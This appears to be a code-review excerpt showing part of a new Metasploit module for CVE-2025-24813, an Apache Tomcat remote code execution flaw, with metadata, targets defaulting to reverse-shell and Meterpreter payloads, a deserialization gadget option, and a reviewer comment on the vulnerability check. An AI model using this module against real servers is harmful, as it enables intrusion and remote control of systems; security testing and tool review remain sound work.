modules/exploits/multi/http/apache_tomcat_rce_cve_2025_24813.rb

```diff
@@ -0,0 +1,235 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'COSCO Shipping Lines DIC', # Original research
+          'sw0rd1ight', # Original research
+          'westonsteimel', # Github Advisory
+          'Rudraditya Thakur (h4ck3r-04)' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2025-24813'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-24813'],
+          ['URL', 'https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq'],
+          ['URL', 'http://www.openwall.com/lists/oss-security/2025/03/10/5'],
+          ['URL', 'https://github.com/absholi7ly/POC-CVE-2025-24813/blob/main/README.md'],
+          ['URL', 'https://github.com/sw0rd1ight']
+        ],
+        'Platform' => ['win', 'linux', 'unix'],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2025-03-10',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'TARGETURI' => '/'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('SESSION_ID', [false, 'Target session ID (default: auto-detect)', '']),
+      OptString.new('GADGET', [true, 'Java deserialization gadget chain', 'CommonsCollections6']),
+      OptBool.new('VERIFY_SSL', [true, 'Verify SSL certificate', true])
+    ])
+  end
+
+  # Checks if the target is vulnerable
+  def check
+    vprint_status("Checking if #{peer} is vulnerable.")
+    res = check_writable_servlet
+    return CheckCode::Safe('Target is not Apache Tomcat.') unless res&.headers['Server']
```

Comment:
Maybe add a check on the value of the `server` header? Also, the message should be less categorical.